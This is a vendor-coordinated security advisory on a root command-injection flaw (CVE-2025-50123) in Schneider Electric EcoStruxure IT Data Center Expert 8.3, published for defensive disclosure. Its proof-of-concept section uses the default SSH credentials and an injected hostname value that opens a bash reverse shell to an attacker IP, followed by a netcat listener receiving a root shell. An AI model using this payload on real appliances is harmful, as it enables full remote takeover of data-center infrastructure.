📄 Schneider Electric EcoStruxure IT Data Center Expert 8.3 Remote Command Execution

KL-001-2025-009: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution
    
    Title: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution
    Advisory ID: KL-001-2025-009
    Publication Date: 2025-07-09
    Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-009.txt
    
    
    1. Vulnerability Details
    
         Affected Vendor: Schneider Electric
         Affected Product: EcoStruxure IT Data Center Expert
         Affected Version: 8.3 and prior
         Platform: CentOS
         CWE Classification: CWE-1286: Improper Validation of Syntactic
                             Correctness of Input, CWE-94: Improper
                             Control of Generation of Code
                             ('Code Injection')
         CVE ID: CVE-2025-50123
    
    
    2. Vulnerability Description
    
         When performing the configuration of the Data Center Expert
         ("DCE") appliance, sufficient input sanitization is not
         performed on the value provided for the hostname of the
         appliance. The hostname variable can include a command
         terminator and subsequent commands, that will be executed with
         root privileges.
    
    
    3. Technical Description
    
         In the .bcsetup script which drives and controls the SSH-based
         configuration of the appliance, the hostname value accepted
         from the user is not sufficiently sanitized.  The script does
         check to ensure there is hostname value provided that includes
         (but not limited to) a valid hostname.
    
           def checkHostnameFormat(hn):
             result = False
             try:
                 hostname_check = re.compile('[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+')
                 result = hostname_check.match(hn)
             except:
                 result = False
             return result
    
         A hostname value can be provided that passes this check, but
         that also includes a semi-colon followed by operating system
         commands. The .bcsetup script runs with root privileges, so
         the command(s) after the semi-colon are also executed with
         root privileges. It is likely this happens when the appliance
         attempts to perform DNS resolution:
    
           def resolveHostnameToIPAddr(new_hostname):
             global domain
    
             if ("" != domain):
                 result_string = execOSCmd("host " + new_hostname)
                 if (-1 == result_string.find("has address " + ipaddr)):
                     return False
                 else:
                     return True
    
             return False
    
    
    4. Mitigation and Remediation Recommendation
    
         Version 9.0 of EcoStruxure IT Data Center Expert includes
         fixes for these vulnerabilities and is available upon request
         from Schneider Electric's Customer Care Center. Refer to
    https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf.
    
    
    5. Credit
    
         This vulnerability was discovered by Jaggar Henry and Jim
         Becher of KoreLogic, Inc.
    
    
    6. Disclosure Timeline
    
         2024-11-21 : KoreLogic reports vulnerability details to
                      Schneider Electric CPCERT.
         2024-11-22 : Vendor acknowledges receipt of KoreLogic's
                      submission.
         2024-12-06 : Vendor confirms the reported vulnerability.
         2024-12-12 : Vendor requests a meeting with KoreLogic to discuss
                      the timeline of remediation efforts for this
                      vulnerability, as well as for associated submissions
                      from KoreLogic.
         2024-12-18 : KoreLogic and Schneider Electric agree to embargo
                      vulnerability details until product update 9.0,
                      circa July, 2025.
         2025-01-29 : Vendor provides status update.
         2025-03-17 : Vendor provides beta release containing remediation
                      for this and other associated vulnerabilities
                      reported by KoreLogic.
         2025-06-20 : Vendor notifies KoreLogic that the publication date
                      for this vulnerability will be 2025-07-08.
         2025-07-08 : Vendor public disclosure.
         2025-07-09 : KoreLogic public disclosure.
    
    
    7. Proof of Concept
    
         DCE Appliance:
    
         SSH in to the appliance using apcsetup / apcsetup (default
         credentials) and you will be placed in a restricted shell that
         runs a configuration utility. Accept or set the configuration
         settings until you get the the prompt for setting the hostname.
         When prompted for the hostname, provide the following value:
    
         "xyzzy.domain.com;bash -i >& /dev/tcp/192.168.2.1/18953 0>&1"
    
    
         ATTACKER BOX:
         $ nc -v -l -p 18953 -s 192.168.2.1
         Listening on 192.168.2.1 18953
         Connection received on 192.168.2.90 35780
         [root@xyzzy ~]# id
         id
         uid=0(root) gid=0(root) groups=0(root)
         [root@xyzzy ~]#
    
    
    The contents of this advisory are copyright(c) 2025
    KoreLogic, Inc. and are licensed under a Creative Commons
    Attribution Share-Alike 4.0 (United States) License:
    http://creativecommons.org/licenses/by-sa/4.0/
    
    KoreLogic, Inc. is a founder-owned and operated company with a
    proven track record of providing security services to entities
    ranging from Fortune 500 to small and mid-sized companies. We
    are a highly skilled team of senior security consultants doing
    by-hand security assessments for the most important networks in
    the U.S. and around the world. We are also developers of various
    tools and resources aimed at helping the security community.
    https://www.korelogic.com/about-korelogic.html
    
    Our public vulnerability disclosure policy is available at:
    https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy